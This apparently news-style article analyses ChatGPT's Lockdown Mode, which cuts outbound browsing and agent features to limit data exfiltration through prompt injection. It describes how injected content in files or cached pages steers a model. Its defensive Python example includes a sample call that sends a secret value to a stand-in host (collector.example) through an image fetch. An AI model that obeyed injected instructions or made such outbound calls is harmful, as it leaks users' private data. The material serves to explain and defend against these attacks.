OpenAI added an optional security setting called Lockdown Mode to ChatGPT on June 6, cutting off the outbound network paths that attackers use to exfiltrate data through prompt-injection attacks. The feature is available now on Free, Go, Plus, Pro, and self-serve Business accounts. Enterprise admin controls remain separate.

The mechanism is deliberate and narrow. Lockdown Mode disables live web browsing, web image retrieval, Deep Research, and Agent Mode. Cached web content, image generation, file uploads, and standard chat remain functional. The design choice reflects the actual threat model: prompt injections often work by hijacking an outbound request, so removing the outbound requests limits the damage even when the injection itself succeeds.

OpenAI’s documentation on this point is worth noting because it is unusually plain. The help page states directly that Lockdown Mode does not prevent a prompt injection from appearing in content ChatGPT processes. An injected payload inside a cached page or an uploaded file can still alter the model’s behavior. The feature reduces exfiltration surface, not injection surface. Most enterprise security announcements oversell the scope of protection; OpenAI is underselling it, which is the more defensible posture if the claim ever gets stress-tested.
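A minimal model of that distinction, as an added example rather than OpenAI's implementation: a deny-by-default gate over the tool calls a model plans, plus a check that treats a blocked outbound call carrying session data as evidence that an injection still landed. The capability names, the sample calls and the `collector.example` URL are constructed for illustration.

```python
from dataclasses import dataclass

# Hypothetical capability names for the features the article lists.
OUTBOUND = {"live_browse", "web_image_fetch", "deep_research", "agent_mode"}
LOCAL = {"cached_web", "image_generation", "file_upload", "chat"}


@dataclass(frozen=True)
class ToolCall:
    capability: str
    argument: str


def gate(calls, lockdown):
    """Split planned calls into (allowed, blocked); unknown capabilities are denied."""
    allowed, blocked = [], []
    for call in calls:
        ok = call.capability in LOCAL or (
            call.capability in OUTBOUND and not lockdown)
        (allowed if ok else blocked).append(call)
    return allowed, blocked


def injection_signals(blocked, sensitive_values):
    """Blocked outbound calls that carried session data: the injection still
    steered the model, only the exfiltration path was missing."""
    return [c for c in blocked
            if c.capability in OUTBOUND
            and any(v in c.argument for v in sensitive_values)]


# Constructed sample: calls a model plans after reading an uploaded file
# that contains injected instructions. All values are made up.
SECRET = "ACME-Q3-FORECAST"
PLANNED = [
    ToolCall("chat", "summarise the uploaded file"),
    ToolCall("web_image_fetch", f"https://collector.example/p.png?d={SECRET}"),
    ToolCall("cached_web", "cached copy of a documentation page"),
    ToolCall("unlisted_plugin", "sync notes"),
]

if __name__ == "__main__":
    for mode in (False, True):
        allowed, blocked = gate(PLANNED, lockdown=mode)
        hits = injection_signals(blocked, [SECRET])
        print(f"lockdown={mode}: allowed={[c.capability for c in allowed]} "
              f"blocked={[c.capability for c in blocked]} "
              f"signals={[c.capability for c in hits]}")
```

With the gate off, the call carrying the session value is allowed and nothing is flagged; with it on, the same call is blocked and surfaces as a signal worth alerting on.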

The trade-off is real. Turning on Lockdown Mode means surrendering the agentic capabilities that justify a ChatGPT subscription for autonomous workflows. Deep Research and Agent Mode are the product’s highest-leverage features for anyone using it to work rather than chat. Security-conscious teams will have to choose between defensive defaults and operational reach. That is not a flaw in the design; it is an honest acknowledgment that the two goals pull against each other.

This release fits a pattern that has been building across the inference stack. Anthropic’s Glasswing distribution model and its Mythos security consortium are addressing trust and isolation at the deployment layer. The Kasra hack test demonstrated that injected context can redirect frontier models in production. Vercel’s BotID post documented credential and inference theft at the API layer. Each of those developments treats the inference-time security perimeter as incomplete. Lockdown Mode is a consumer-facing expression of the same diagnosis: the model will process whatever it is given, so the viable defence is restricting what it can touch.

What OpenAI has built here is less a security solution and more a security posture selector. Users who need to protect sensitive data during a session can flip the toggle and accept reduced functionality. Users who need agent capabilities cannot, because the toggle disables them. The honest framing in the docs suggests OpenAI is positioning this as one layer in a stack rather than a complete fix, which is the correct framing. Whether that nuance survives procurement conversations at large organisations is a different question.

For teams currently evaluating ChatGPT for agentic workflows involving sensitive internal data, Lockdown Mode clarifies the architecture decision: you cannot have ambient agent access and strong exfiltration controls simultaneously in the current product. That constraint should inform whether ChatGPT’s agent layer belongs in a workflow that touches privileged documents, or whether a more isolated deployment model is the right call.

OpenAI (help.openai.com), published 2026-06-06. Also covered by TechCrunch and The Decoder.